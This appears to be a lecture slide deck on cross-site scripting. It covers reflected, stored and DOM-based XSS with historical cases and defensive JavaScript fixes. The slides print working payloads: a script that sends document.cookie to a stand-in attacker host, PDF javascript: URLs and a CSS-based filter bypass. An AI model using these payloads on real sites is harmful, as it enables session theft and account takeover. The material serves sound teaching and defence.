Module6 3

Cross-site scripting (XSS) vulnerabilities occur when malicious scripts are injected into otherwise benign and trusted web sites. There are three main types of XSS attacks: reflected XSS echoes a malicious script back to the user as part of a page from the victim site; stored XSS embeds malicious code in a resource the site manages, such as its database; and DOM-based XSS exploits vulnerabilities in client-side scripts. XSS has been used in high-profile attacks and can compromise user cookies, accounts, and privacy. Careful input validation is needed on web sites to prevent XSS exploits.

Uploaded by Harpreet Singh

Module 6.3
Cross Site Scripting
XSS
Three top web site vulnerabilities

SQL Injection
  Browser sends malicious input to server
  Bad input checking leads to malicious SQL query
  [diagram: attacker's malicious code executed on victim server]

CSRF Cross-site request forgery
  Bad web site sends request to good web site, using credentials of an innocent victim who visits site
  [diagram: attacker site forges request from victim browser to victim server]

XSS Cross-site scripting
  Bad web site sends innocent victim a script that steals information from an honest web site
  [diagram: attacker's malicious code executed on victim browser]
Basic scenario: reflected XSS attack

[diagram: Attack Server, Victim client, Victim Server]
1. Victim client visits attacker's web site
2. Victim receives malicious link
3. Victim clicks on link
4. Victim Server echoes user input
5. Victim client sends valuable data to Attack Server
XSS example: vulnerable site

search field on victim.com:
  http://victim.com/search.php?term=apple

Server-side implementation of search.php:
  <HTML> <TITLE> Search Results </TITLE>
  <BODY>
  Results for <?php echo $_GET['term'] ?>
  . . .
  (echoes the search term into the response)
Bad input

Consider link: (properly URL encoded)
  http://victim.com/search.php?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. Victim.com returns
   <HTML> Results for <script> ... </script>
3. Browser executes script:
   Sends badguy.com cookie for victim.com
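The defect in search.php is that the search term is written into the page without being encoded for an HTML context. The following is an added example, not code from the slides: it restates the echo in JavaScript (standing in for the PHP) in its vulnerable form and in a hardened form that applies HTML output encoding at the sink, then runs both over the benign link and the cookie-stealing link from the slide. The function names (escapeHtml, renderSearchVulnerable, renderSearchSafe, termFromUrl, containsScriptTag) are this example's own.

```javascript
// Added example (not from the slides): the search.php echo re-expressed in
// JavaScript, vulnerable and hardened, with the untrusted term encoded at the
// point where it is written into markup.

// Escape the five characters that let attacker-controlled text change the
// meaning of an HTML text node or a double-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: mirrors `Results for <?php echo $_GET['term'] ?>`.
function renderSearchVulnerable(term) {
  return `<html><title>Search Results</title><body>Results for ${term}</body></html>`;
}

// Hardened: same page, but the term is encoded for an HTML text context.
function renderSearchSafe(term) {
  return `<html><title>Search Results</title><body>Results for ${escapeHtml(term)}</body></html>`;
}

// Parse the `term` query parameter the way a server would, so the rendering
// functions receive the decoded value the browser actually sent.
function termFromUrl(url) {
  return new URL(url).searchParams.get("term") ?? "";
}

// Crude detector for the outcome that matters here: did a <script> element
// end up in the response markup?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample links: the benign one and the cookie-stealing one from
// the slide, the latter URL-encoded as a real link would be.
const BENIGN_LINK = "http://victim.com/search.php?term=apple";
const MALICIOUS_LINK = "http://victim.com/search.php?term=" +
  encodeURIComponent('<script>window.open("http://badguy.com?cookie="+document.cookie)</script>');

// Run both renderers over both links and report which outputs carry a script.
function compare(link) {
  const term = termFromUrl(link);
  return {
    vulnerable: containsScriptTag(renderSearchVulnerable(term)),
    hardened: containsScriptTag(renderSearchSafe(term)),
  };
}

console.log("benign   ", compare(BENIGN_LINK));     // { vulnerable: false, hardened: false }
console.log("malicious", compare(MALICIOUS_LINK));  // { vulnerable: true, hardened: false }
```

The hardened page still shows the attacker's text ("Results for <script>...") to the user, but as literal characters: the browser never sees a script element, so nothing runs and document.cookie is never sent anywhere.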
[diagram: Attack Server (www.attacker.com), Victim client, Victim Server (www.victim.com)]
1. User gets bad link:
   http://victim.com/search.php?term=<script> ... </script>
2. User clicks on link
3. Victim echoes user input:
   <html>
   Results for
   <script>
   window.open(http://attacker.com? ... document.cookie ...)
   </script>
   </html>
What is XSS?

An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application

Methods for injecting malicious code:
  Reflected XSS (type 1)
    the attack script is reflected back to the user as part of a page from the victim site
  Stored XSS (type 2)
    the attacker stores the malicious code in a resource managed by the web application, such as a database
  Others, such as DOM-based attacks
Basic scenario: reflected XSS attack (Email version)

[diagram: Attack Server, User Victim, Server Victim]
1. Collect email addresses
2. Send malicious email
3. Click on link
4. Echo user input
5. Send valuable data
2006 Example Vulnerability

Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website.
Injected code redirected PayPal visitors to a page warning users their accounts had been compromised.
Victims were then redirected to a phishing site and prompted to enter sensitive financial data.

Source: http://www.acunetix.com/news/paypal.htm
Adobe PDF viewer feature (version <= 7.9)

PDF documents execute JavaScript code
  http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:code_here

The code will be executed in the context of the domain where the PDF file is hosted
This could be used against PDF files hosted on the local filesystem

http://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-in.html
Here's how the attack works:

Attacker locates a PDF file hosted on website.com
Attacker creates a URL pointing to the PDF, with JavaScript Malware in the fragment portion
  http://website.com/path/to/file.pdf#s=javascript:alert("xss");)
Attacker entices a victim to click on the link
If the victim has Adobe Acrobat Reader Plugin 7.0.x or less, confirmed in Firefox and Internet Explorer, the JavaScript Malware executes

Note: alert is just an example. Real attacks do something worse.


And if that doesn't bother you...

PDF files on the local filesystem:
  file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#blah=javascript:alert("XSS");

JavaScript Malware now runs in local context with the ability to read local files ...
Reflected XSS attack

[diagram: Attack Server, User Victim, Server Victim]
Attack Server: send bad stuff (the malicious link)
3. User Victim clicks on link
4. Server Victim echoes user input: reflect it back
5. User Victim sends valuable data to Attack Server
Stored XSS

[diagram: Attack Server, User Victim, Server Victim]
1. Attack Server injects malicious script into Server Victim: store bad stuff
2. User Victim requests content
3. User Victim receives malicious script: download it
4. Malicious script steals valuable data and sends it to Attack Server
MySpace.com (Samy worm)

Users can post HTML on their pages
  MySpace.com ensures HTML contains no
    <script>, <body>, onclick, <a href=javascript://>
  but can do Javascript within CSS tags:
    <div style=background:url(javascript:alert(1))>
  And can hide javascript as java\nscript

With careful javascript hacking:
  Samy worm infects anyone who visits an infected MySpace page and adds Samy as a friend.
  Samy had millions of friends within 24 hours.

http://namb.la/popular/tech.html
Stored XSS using images

Suppose pic.jpg on web server contains HTML !
request for http://site.com/pic.jpg results in:

  HTTP/1.1 200 OK
  Content-Type: image/jpeg

  <html> fooled ya </html>

IE will render this as HTML (despite Content-Type)

Consider photo sharing sites that support image uploads
  What if attacker uploads an image that is a script?
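Two controls address the upload scenario on this slide: refuse to store a file whose bytes do not look like an image, and serve stored uploads with a Content-Type derived from the bytes plus the X-Content-Type-Options: nosniff header, which tells browsers that support it to honour the declared type rather than sniff the body for HTML. The following is an added example, not code from the slides. The signatures are the standard JPEG, PNG and GIF magic bytes; the sample inputs are constructed (the slide's HTML body, and a JPEG header fragment rather than a full image); the function names detectImageType and uploadResponseHeaders are this example's own. A signature check rejects the plain HTML file shown on the slide; it does not by itself catch a valid image with HTML hidden in a comment segment, which is why the header matters as well.

```javascript
// Added example (not from the slides): validate that an uploaded "image"
// starts like an image, and choose response headers that stop the browser
// from reinterpreting the body as HTML.

// Well-known file signatures ("magic bytes") for the common web image formats.
const IMAGE_SIGNATURES = [
  { type: "image/jpeg", magic: [0xff, 0xd8, 0xff] },
  { type: "image/png",  magic: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: "image/gif",  magic: [0x47, 0x49, 0x46, 0x38] }, // "GIF8"
];

// Return the detected image MIME type, or null when the leading bytes match
// no signature (the slide's "<html> fooled ya </html>" file lands here).
function detectImageType(bytes) {
  for (const { type, magic } of IMAGE_SIGNATURES) {
    if (bytes.length >= magic.length && magic.every((b, i) => bytes[i] === b)) {
      return type;
    }
  }
  return null;
}

// Headers for serving a stored upload. Content-Type comes from the bytes,
// never from the uploader's filename or declared type, and nosniff asks the
// browser to trust it. Returns null when the upload should be rejected.
function uploadResponseHeaders(bytes) {
  const type = detectImageType(bytes);
  if (type === null) return null;
  return {
    "Content-Type": type,
    "X-Content-Type-Options": "nosniff",
  };
}

// Constructed samples: the slide's HTML body mislabelled as pic.jpg, and the
// first bytes of a JPEG/JFIF file (not a complete, decodable image).
const FAKE_PIC_JPG = Buffer.from("<html> fooled ya </html>", "utf8");
const REAL_JPEG_HEADER = Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46]);

console.log("pic.jpg accepted:", uploadResponseHeaders(FAKE_PIC_JPG) !== null);     // false
console.log("jpeg accepted:   ", uploadResponseHeaders(REAL_JPEG_HEADER) !== null); // true
```

In a real upload handler the bytes would come from the request body and the returned headers would be set on the response; the same check belongs in the storage path so a file that fails it is never written to the image directory at all.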
DOM-based XSS (no server used)

Example page
  <HTML><TITLE>Welcome!</TITLE>
  Hi <SCRIPT>
  var pos = document.URL.indexOf("name=") + 5;
  document.write(document.URL.substring(pos, document.URL.length));
  </SCRIPT>
  </HTML>

Works fine with this URL
  http://www.example.com/welcome.html?name=Joe
But what about this one?
  http://www.example.com/welcome.html?name=<script>alert(document.cookie)</script>

Amit Klein ... XSS of the Third Kind
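The welcome page has two weaknesses: it slices the raw URL with indexOf/substring instead of parsing it, and it hands the result to document.write, a sink that parses its argument as HTML. The following is an added example, not code from the slides: it rewrites the page's script to read the name through the URL parser and write it with textContent, which creates a text node and never invokes the HTML parser. The element passed to renderGreeting is a constructed stand-in so the code runs outside a browser (in a page you would pass document.getElementById(...)); the names nameFromUrlLegacy, nameFromUrl, renderGreeting and fakeElement are this example's own.

```javascript
// Added example (not from the slides): the welcome page's script with the URL
// parsed as a URL and the name written as text rather than markup.

// The slide's extraction: everything after "name=" is taken verbatim, including
// any further parameters or markup that follow it.
function nameFromUrlLegacy(url) {
  const pos = url.indexOf("name=") + 5;
  return url.substring(pos, url.length);
}

// Safe extraction: let the URL parser isolate and decode just the parameter.
function nameFromUrl(url) {
  return new URL(url).searchParams.get("name") ?? "";
}

// Safe sink: textContent creates a text node, so "<script>" is displayed as
// literal characters and never becomes an element.
function renderGreeting(element, url) {
  element.textContent = "Hi " + nameFromUrl(url);
  return element.textContent;
}

// Constructed stand-in for a DOM element. Writing innerHTML (the HTML-parsing
// sink, the modern equivalent of the slide's document.write) throws, so a run
// that completes proves the safe path never touched an HTML sink.
function fakeElement() {
  return {
    textContent: "",
    set innerHTML(_) { throw new Error("HTML sink used with untrusted data"); },
  };
}

// The two URLs from the slide, the second URL-encoded as a real link would be.
const GOOD_URL = "http://www.example.com/welcome.html?name=Joe";
const BAD_URL = "http://www.example.com/welcome.html?name=" +
  encodeURIComponent("<script>alert(document.cookie)</script>");

console.log(renderGreeting(fakeElement(), GOOD_URL)); // Hi Joe
console.log(renderGreeting(fakeElement(), BAD_URL));  // Hi <script>alert(document.cookie)</script>
```

With the second URL the page now shows the tag text to the user instead of running it; the difference is entirely in the sink, which is why fixing DOM-based XSS means auditing every place client-side code writes attacker-influenced data into the document, not validating the URL alone.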
